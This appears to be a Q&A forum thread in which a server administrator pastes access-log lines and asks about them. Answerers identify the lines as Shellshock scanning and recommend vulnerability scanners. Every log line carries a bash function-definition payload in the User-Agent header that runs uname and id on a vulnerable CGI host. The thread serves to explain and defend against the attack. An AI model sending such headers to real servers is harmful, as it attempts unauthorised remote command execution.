# cgi-bin attack attempt on server - is this a threat?

Tags: security, server, cgi

I was just reading the logs from our server today, and found these cgi requests made by some IP. (I have just pasted a few of them).

Do you have any idea what he was doing by these requests and if they pose a security issue? How should I defend from such attacks in the future?

```
62.210.113.143 - - [29/Sep/2015:13:36:00 -0700] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 200 18 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:00 -0700] "GET /cgi-bin/status/status.cgi HTTP/1.1" 301 266 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:00 -0700] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:01 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 1963 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:03 -0700] "GET /cgi-mod/index.cgi HTTP/1.1" 301 258 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:03 -0700] "GET /cgi-mod/index.cgi HTTP/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:04 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 301 257 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:04 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""

62.210.113.143 - - [29/Sep/2015:13:36:04 -0700] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 261 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
```

Answer (score 0):

it's most likely a crawler looking for exploitable hosts, the requests you are seeing should not pose a threat unless you are vulnerable to shellshock (you can use [this tool](https://shellshocker.net) to check if you are)

Answer (score 0):

Yes, it's a threat, but unless you have a vulnerability it is not a risk to you.

Best practise is to regularly scan your servers with a vulnerability scanner. Nessus if you have the budget, or OpenVAS for the open source fork.

Answer (score 0):

Definitely,

This attack is used in order to exploit the Shellshock vulnerability that is out there and particularly on /cgi-bin/ endpoints.

See more on https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf